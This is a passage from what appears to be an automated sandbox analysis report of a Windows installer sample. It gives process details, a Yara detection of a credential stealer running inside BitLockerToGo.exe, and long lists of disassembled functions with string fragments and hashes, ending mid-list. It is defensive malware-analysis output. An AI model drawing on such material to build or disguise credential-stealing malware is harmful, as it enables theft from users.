Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	13:42:25
Start date:	05/01/2025
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Imagebase:	0x940000
File size:	231'736 bytes
MD5 hash:	A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2381638051.0000000002F75000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000003.2396721217.0000000002F75000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Function 0BCA474E Relevance: 124.1, Strings: 99, Instructions: 381COMMON

Download Yara Rule

Strings

$, xrefs: 0BCA479B
L, xrefs: 0BCA4CD1
p, xrefs: 0BCA4BD5
7, xrefs: 0BCA4D2C
~, xrefs: 0BCA4B73
2, xrefs: 0BCA47DB
4, xrefs: 0BCA4847
L, xrefs: 0BCA481B
t, xrefs: 0BCA4BB9
f, xrefs: 0BCA485B
e, xrefs: 0BCA476F
|, xrefs: 0BCA494B
;, xrefs: 0BCA483F
l, xrefs: 0BCA4975
x, xrefs: 0BCA4833
v, xrefs: 0BCA4BAB
z, xrefs: 0BCA4B8F
5, xrefs: 0BCA47CF
g, xrefs: 0BCA4B42
Z, xrefs: 0BCA4C6F
r, xrefs: 0BCA480B
3, xrefs: 0BCA4827
1, xrefs: 0BCA4DDC
>, xrefs: 0BCA4C06
x, xrefs: 0BCA4B9D
R, xrefs: 0BCA4CA7
G, xrefs: 0BCA47DF
t, xrefs: 0BCA48F5
n, xrefs: 0BCA4BE3
q, xrefs: 0BCA4817
O, xrefs: 0BCA4B34
s, xrefs: 0BCA477D
3, xrefs: 0BCA4DEA
3, xrefs: 0BCA482B
V, xrefs: 0BCA4784
b, xrefs: 0BCA4C37
u, xrefs: 0BCA4952
h, xrefs: 0BCA496E
|, xrefs: 0BCA4843
+, xrefs: 0BCA487B
h, xrefs: 0BCA4C0D
=, xrefs: 0BCA47F3
B, xrefs: 0BCA4D17
F, xrefs: 0BCA4AEE
8, xrefs: 0BCA4837
D, xrefs: 0BCA4D09
V, xrefs: 0BCA4C8B
:, xrefs: 0BCA480F
7, xrefs: 0BCA4DCE
6, xrefs: 0BCA4D1E
l, xrefs: 0BCA4BF1
^, xrefs: 0BCA4C53
\, xrefs: 0BCA47C3
C, xrefs: 0BCA481F
X, xrefs: 0BCA4C7D
(, xrefs: 0BCA47AF
U, xrefs: 0BCA47A7
F, xrefs: 0BCA4CFB
T, xrefs: 0BCA4C99
o, xrefs: 0BCA4991
), xrefs: 0BCA47BF
", xrefs: 0BCA4793
\, xrefs: 0BCA4C61
), xrefs: 0BCA47C7
e, xrefs: 0BCA4761
5, xrefs: 0BCA4DC0
%, xrefs: 0BCA478F
k, xrefs: 0BCA4853
d, xrefs: 0BCA4C29
H, xrefs: 0BCA4CED
6, xrefs: 0BCA4C3E
], xrefs: 0BCA4960
@, xrefs: 0BCA4D25
M, xrefs: 0BCA4DAB
r, xrefs: 0BCA4BC7
=, xrefs: 0BCA47F7
^, xrefs: 0BCA48ED
y, xrefs: 0BCA4823
|, xrefs: 0BCA4B81
", xrefs: 0BCA48E1
<, xrefs: 0BCA4BEA
Q, xrefs: 0BCA48E9
k, xrefs: 0BCA498A
2, xrefs: 0BCA4DE3
j, xrefs: 0BCA4BFF
E, xrefs: 0BCA4998
u, xrefs: 0BCA4967
f, xrefs: 0BCA4C1B
P, xrefs: 0BCA4CB5
!, xrefs: 0BCA475A
N, xrefs: 0BCA4CC3
J, xrefs: 0BCA4CDF
+, xrefs: 0BCA487F
=, xrefs: 0BCA47E7
^, xrefs: 0BCA4768
., xrefs: 0BCA497C
;, xrefs: 0BCA4DB2
], xrefs: 0BCA48E5
`, xrefs: 0BCA4C45

Memory Dump Source

Source File: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: !$"$"$$$%$($)$)$+$+$.$1$2$2$3$3$3$4$5$5$6$6$7$7$8$:$;$;$<$=$=$=$>$@$B$C$D$E$F$F$G$H$J$L$L$M$N$O$P$Q$R$T$U$V$V$X$Z$\$\$]$]$^$^$^$`$b$d$e$e$f$f$g$h$h$j$k$k$l$l$n$o$p$q$r$r$s$t$t$u$u$v$x$x$y$z$|$|$|$~
API String ID: 0-3153423009
Opcode ID: 479f473433373a9dc6b8a0952c2697dbb99d3d035f04bcc6255464b44ba19910
Instruction ID: 9cbafbc61d5d411e151bd170c098d093bc0520778c7b49e4fc3e98809e1afa55
Opcode Fuzzy Hash: 479f473433373a9dc6b8a0952c2697dbb99d3d035f04bcc6255464b44ba19910
Instruction Fuzzy Hash: 6C22F42090C7D9C9DB26867C9C583DDBFA11B23314F4842DDC1D86B3D2D7BA0A89DB66

Function 0BC91D50 Relevance: 115.7, Strings: 91, Instructions: 1939COMMON

Download Yara Rule

Strings

9, xrefs: 0BC93663
., xrefs: 0BC9331D
g, xrefs: 0BC9366B
*, xrefs: 0BC9333D
Y, xrefs: 0BC9367B
", xrefs: 0BC91EF8
`, xrefs: 0BC928AF
o, xrefs: 0BC92EE4
G, xrefs: 0BC92826
:, xrefs: 0BC933BD
-, xrefs: 0BC93703
%, xrefs: 0BC93743
R, xrefs: 0BC9327D
1, xrefs: 0BC936A3
4, xrefs: 0BC93032
&, xrefs: 0BC926B6
F, xrefs: 0BC924EE
[, xrefs: 0BC9267E
G, xrefs: 0BC9269E
`, xrefs: 0BC92D35
s, xrefs: 0BC92656
5, xrefs: 0BC936C3
+, xrefs: 0BC936F3
$, xrefs: 0BC932ED
), xrefs: 0BC936E3
6, xrefs: 0BC92696
:, xrefs: 0BC93042
<, xrefs: 0BC93072
X, xrefs: 0BC932CD
T, xrefs: 0BC936CB
%, xrefs: 0BC922E1
1, xrefs: 0BC92686
K, xrefs: 0BC9307A
4, xrefs: 0BC9336D
?, xrefs: 0BC93693
0, xrefs: 0BC9338D
C, xrefs: 0BC926BE
7, xrefs: 0BC936D3
D, xrefs: 0BC93B0F
M, xrefs: 0BC936FB
7, xrefs: 0BC93205
M, xrefs: 0BC926CE
m, xrefs: 0BC926A6
+, xrefs: 0BC91EF3
>, xrefs: 0BC9339D
P, xrefs: 0BC9328D
A, xrefs: 0BC926AE
L, xrefs: 0BC926C6
,, xrefs: 0BC921AE
, xrefs: 0BC9330D
3, xrefs: 0BC936B3
g, xrefs: 0BC9362B
,, xrefs: 0BC9332D
Y, xrefs: 0BC9266E
^, xrefs: 0BC9329D
2, xrefs: 0BC9337D
", xrefs: 0BC932FD
=, xrefs: 0BC93683
$, xrefs: 0BC9373B
D, xrefs: 0BC93B02
a, xrefs: 0BC923A0
G, xrefs: 0BC928A7
;, xrefs: 0BC93673
$, xrefs: 0BC92666
!, xrefs: 0BC93723
&, xrefs: 0BC932DD
&, xrefs: 0BC92836
x, xrefs: 0BC92039
Z, xrefs: 0BC932BD
6, xrefs: 0BC9335D
E, xrefs: 0BC9268E
0, xrefs: 0BC93012
8, xrefs: 0BC933CD
U, xrefs: 0BC9369B
%, xrefs: 0BC9282E
_, xrefs: 0BC9265E
8, xrefs: 0BC93052
H, xrefs: 0BC9306A
D, xrefs: 0BC9385E
\, xrefs: 0BC932AD
(, xrefs: 0BC9334D
6, xrefs: 0BC93022
a, xrefs: 0BC928B7
f, xrefs: 0BC928BF
>, xrefs: 0BC93062
Q, xrefs: 0BC936AB
o, xrefs: 0BC935EB
/, xrefs: 0BC93713
#, xrefs: 0BC93733
<, xrefs: 0BC933AD
e, xrefs: 0BC92E7A

Memory Dump Source

Source File: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: $!$"$"$#$$$$$$$%$%$%$&$&$&$($)$*$+$+$,$,$-$.$/$0$0$1$1$2$3$4$4$5$6$6$6$7$7$8$8$9$:$:$;$<$<$=$>$>$?$A$C$D$D$D$E$F$G$G$G$H$K$L$M$M$P$Q$R$T$U$X$Y$Y$Z$[$\$^$_$`$`$a$a$e$f$g$g$m$o$o$s$x
API String ID: 0-2155068421
Opcode ID: bb2883d1cef4d7494fb256f06f4a2afc22fe7a9de83d75a8b970045db8de47fc
Instruction ID: fc2ebcded1302e40f404cad8b945f722ad4c3d61c4212358a86e6cb8c9ce052d
Opcode Fuzzy Hash: bb2883d1cef4d7494fb256f06f4a2afc22fe7a9de83d75a8b970045db8de47fc
Instruction Fuzzy Hash: DC03CA7051C7C08EEB359B3898483AFBBE1AB96314F088A6DD4E98B3C2D7798545C747

Function 0BCA6400 Relevance: 25.4, Strings: 20, Instructions: 450COMMON

Download Yara Rule

Strings

{0y6, xrefs: 0BCA6837
4, xrefs: 0BCA6A4B
|c, xrefs: 0BCA6C4B
V$T:, xrefs: 0BCA6816
IZ, xrefs: 0BCA6750
v4E, xrefs: 0BCA6842
y{, xrefs: 0BCA64B1
A*, xrefs: 0BCA6C6C
_,Y", xrefs: 0BCA6800
H<{2, xrefs: 0BCA682C
jV, xrefs: 0BCA675B
yx, xrefs: 0BCA6C56
fVd, xrefs: 0BCA6E3F
(bQ`, xrefs: 0BCA6E4A
q(s., xrefs: 0BCA67F5
.Z!X, xrefs: 0BCA6E08
zp, xrefs: 0BCA6C61
E, xrefs: 0BCA6863
R V&, xrefs: 0BCA680B
9;, xrefs: 0BCA6561

Memory Dump Source

Source File: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: fVd$(bQ`$.Z!X$4$A*$E$H<{2$IZ$R V&$V$T:$_,Y"$jV$q(s.$v4E$yx$zp${0y6$|c$9;$y{
API String ID: 0-148316829
Opcode ID: 9db26bece4fd15e574cc8732102fae516a47cf65bbfb7beb56c546ac8441d70d
Instruction ID: 62c37f970ed824856ba3acf39b22cd897dd8fcd117d5ee96b0abdd72cbad8d86
Opcode Fuzzy Hash: 9db26bece4fd15e574cc8732102fae516a47cf65bbfb7beb56c546ac8441d70d
Instruction Fuzzy Hash: AF42EAB160C3948AE334CF54C4427CBBAF2FB92304F40892DC9D96B656DBB5464ACB97

Function 0BC91155 Relevance: 13.1, Strings: 10, Instructions: 609COMMON

Download Yara Rule

Strings

;, xrefs: 0BC914DC
D, xrefs: 0BC917A7
K, xrefs: 0BC9138E
*, xrefs: 0BC91398
H, xrefs: 0BC9181F
$, xrefs: 0BC91827
D, xrefs: 0BC9179F
), xrefs: 0BC91393
+, xrefs: 0BC911F9
I, xrefs: 0BC91163

Memory Dump Source

Source File: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: $$)$*$+$;$D$D$H$I$K
API String ID: 0-204169191
Opcode ID: 3d59df1819dc5ac7b2a10b0dd07d8e128e61e28551400a76daf931016d189c29
Instruction ID: 51099b392ccad5553820337469b5c03a2fa4244a7eeb449a76243088063ebaac
Opcode Fuzzy Hash: 3d59df1819dc5ac7b2a10b0dd07d8e128e61e28551400a76daf931016d189c29
Instruction Fuzzy Hash: 5B32387291D7818FE7249B38D4993AFBBE1ABC5324F198B2DD4E9D73C1D63489008B42

Function 0BC9066B Relevance: 12.0, Strings: 9, Instructions: 740COMMON

Download Yara Rule

Strings

f, xrefs: 0BC90974
%, xrefs: 0BC90C33
", xrefs: 0BC90E20
b, xrefs: 0BC90DB8
v, xrefs: 0BC90DB0
8, xrefs: 0BC90708
s, xrefs: 0BC90810
J, xrefs: 0BC90E18
T, xrefs: 0BC90ED2

Memory Dump Source

Source File: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: "$%$8$J$T$b$f$s$v
API String ID: 0-1583681712
Opcode ID: c7cae5505db34a0e5244fea5bf74a8d53b8840826db9faa5f4a54d0417d5cb86
Instruction ID: 0b2a5d79789842616b9f407a52887786031b6c039129b22f0b62c828c0d923e1
Opcode Fuzzy Hash: c7cae5505db34a0e5244fea5bf74a8d53b8840826db9faa5f4a54d0417d5cb86
Instruction Fuzzy Hash: 5A52E271A1C7808FE7249F38D4893AEBBE1ABC5214F194D2ED4EAC7382D6758944CB43

Function 0BCA1550 Relevance: 10.5, Strings: 8, Instructions: 459COMMON

Download Yara Rule

Strings

,, xrefs: 0BCA19E9
j, xrefs: 0BCA179F
Z, xrefs: 0BCA1723
d, xrefs: 0BCA1719
5, xrefs: 0BCA1714
", xrefs: 0BCA1A8A
!@, xrefs: 0BCA1583
e, xrefs: 0BCA171E

Memory Dump Source

Source File: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: !@$"$,$5$Z$d$e$j
API String ID: 0-445193379
Opcode ID: 9f611ad421d464619138d9b0e9f201b01a8f82b86c7b541cdee8c35b6bb027ad
Instruction ID: 2b914b3e42e79290d9110486450a8480136fa6bda86d2d94576536d0444849c3
Opcode Fuzzy Hash: 9f611ad421d464619138d9b0e9f201b01a8f82b86c7b541cdee8c35b6bb027ad
Instruction Fuzzy Hash: 0402B1B162C3428FD3248F39C48436EBBE1AB86718F188A2DE5E9973D1D7758845CB42

Function 0BCA7A80 Relevance: 9.0, Strings: 7, Instructions: 297COMMON

Download Yara Rule

Strings

<=, xrefs: 0BCA7D43
y5W7, xrefs: 0BCA7D33
"G, xrefs: 0BCA7B26
;G5A, xrefs: 0BCA7C9E
Q9V;, xrefs: 0BCA7D3B
6C\], xrefs: 0BCA7CA6
pKrE, xrefs: 0BCA7E16, 0BCA7E27

Memory Dump Source

Source File: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: "G$6C\]$;G5A$<=$Q9V;$pKrE$y5W7
API String ID: 0-777214555
Opcode ID: c2ac33536d4220ac95527574bd899c2ea5a9f49d2d47c5f32e84881aca040e42
Instruction ID: 16c3feb3160245a61d63f6139775887ac46a60f0df3f8d470b37e7f8a1a7abad
Opcode Fuzzy Hash: c2ac33536d4220ac95527574bd899c2ea5a9f49d2d47c5f32e84881aca040e42
Instruction Fuzzy Hash: BDA1EEB161C3418BD328DF54C49576BBBE1FF80318F04892DE9D64B391E7758A09CB96

Function 0BC8A1E0 Relevance: 7.9, Strings: 6, Instructions: 397COMMON

Download Yara Rule

Strings

b, xrefs: 0BC8A3EF
b, xrefs: 0BC8A322
TU, xrefs: 0BC8A332
/,, xrefs: 0BC8A386
ZP, xrefs: 0BC8A33A
c_, xrefs: 0BC8A32A

Memory Dump Source

Source File: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: /,$TU$ZP$b$c_$b
API String ID: 0-386905321
Opcode ID: 350d789fc7c1098592d1eaf6035203377b1fe8648ea5f5d7085ac95abee6f1eb
Instruction ID: 4184ecf6d1b49beb6166d51028c42e1c633ab82add99cc811eaa66a30763b405
Opcode Fuzzy Hash: 350d789fc7c1098592d1eaf6035203377b1fe8648ea5f5d7085ac95abee6f1eb
Instruction Fuzzy Hash: 98D1167165D3808FD328DF69845036BFBE2ABC2308F19D92DE4D94B385C679C50ACB92

Function 0BC8DCE0 Relevance: 7.8, Strings: 6, Instructions: 294COMMON

Download Yara Rule

Strings

&', xrefs: 0BC8E0AC
+, xrefs: 0BC8DD01
=>*R, xrefs: 0BC8DE67
)0%$, xrefs: 0BC8DDD6
x, xrefs: 0BC8DE0D
74&<, xrefs: 0BC8DDCB

Memory Dump Source

Source File: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: &'$)0%$$+$74&<$=>*R$x
API String ID: 0-2915245780
Opcode ID: ae66dcb8edd8295c583b9f8e6c2b1b178c81cf66bcfea210aa0e54298d533f17
Instruction ID: 06a09abf57e7b039357e6084249bffbb5903796d64b5c96b4163b70886d6d40a
Opcode Fuzzy Hash: ae66dcb8edd8295c583b9f8e6c2b1b178c81cf66bcfea210aa0e54298d533f17
Instruction Fuzzy Hash: C5A1FAB014D3C18BE335DF25D4A5BABBFE1EF92308F08596DD4DA4B282C2794509CB66

Function 0BC88570 Relevance: 7.8, Strings: 6, Instructions: 271COMMON

Download Yara Rule

Strings

lgs, xrefs: 0BC885FE
n, xrefs: 0BC886CC
~r, xrefs: 0BC8862E
QP, xrefs: 0BC886C5
AY[g, xrefs: 0BC885E5
qs{~, xrefs: 0BC8860E

Memory Dump Source

Source File: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: AY[g$QP$lgs$n$qs{~$~r
API String ID: 0-2507225295
Opcode ID: 3660883dd4c5d91ee9ca5811cd737909ebfc5fa094f96ae29f06bdccd8c5780d
Instruction ID: b0e889238d5c0e673d8fc72e750421c262c407f861dfeb542926cbe75de07bb5
Opcode Fuzzy Hash: 3660883dd4c5d91ee9ca5811cd737909ebfc5fa094f96ae29f06bdccd8c5780d
Instruction Fuzzy Hash: FD71F43024E3C18AD3119F79849075BFFE1AF93358F1C4A6CE4D44B292D37A860ACB96

Function 0BCBB3D0 Relevance: 7.8, Strings: 6, Instructions: 262COMMON

Download Yara Rule

Strings

#, xrefs: 0BCBB5DD
], xrefs: 0BCBB66F
A, xrefs: 0BCBB5E7
W, xrefs: 0BCBB5E2
M, xrefs: 0BCBB5EC
K, xrefs: 0BCBB674

Memory Dump Source

Source File: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: #$A$K$M$W$]
API String ID: 0-1582937744
Opcode ID: 61c3703998030160270265e7104ff4e3d99f5d2218b49da8d37b493871530d6b
Instruction ID: 5e98c8f45bc94959d62595ab4c3968a206fef83bc6dd9d19095bab6796e3cfbe
Opcode Fuzzy Hash: 61c3703998030160270265e7104ff4e3d99f5d2218b49da8d37b493871530d6b
Instruction Fuzzy Hash: C7A1F62291C7D14AD321967C884479FEFD29BD3224F1D8E6DE5E48B3C2D679C80987A3

Function 0BC83730 Relevance: 6.7, Strings: 5, Instructions: 467COMMON

Download Yara Rule

Strings

), xrefs: 0BC837AD
IHDR, xrefs: 0BC83B2C
IDAT, xrefs: 0BC83B9B
IEND, xrefs: 0BC83C0F
), xrefs: 0BC837B7

Memory Dump Source

Source File: 00000000.00000003.2276222716.000000000BC80000.00000004.00001000.00020000.00000000.sdmp, Offset: 0BC80000, based on PE: true

Associated: 00000000.00000003.2276101028.000000000BCC4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCD4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276101028.000000000BCDA000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276151954.000000000BCB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276168850.000000000BCA4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276186838.000000000BC94000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000003.2276204186.000000000BC84000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_bc80000_Installer_x64.jbxd

Similarity

API ID:
String ID: )$)$IDAT$IEND$IHDR
API String ID: 0-3469842109
Opcode ID: ce1b7496b540264f4fc67de88f7687685213a842e8bf01c1f9f68726c6b9050a
Instruction ID: 8352dd21a576952822238714d847180229518428d84765042b566e44b2526aa1
Opcode Fuzzy Hash: ce1b7496b540264f4fc67de88f7687685213a842e8bf01c1f9f68726c6b9050a
Instruction Fuzzy Hash: 3E0234B06193808FD700EF29D89075ABBE1EBD6308F05892DF9958B391D375D909CBA6

Function 0BC9C470 Relevance: 6.7, Strings: 5, Instructions: 454COMMON

Download Yara Rule

Strings

tz, xrefs: 0BC9C539
ol, xrefs: 0BC9C569
eg, xrefs: 0BC9C7B3
jz, xrefs: 0BC9C7C3
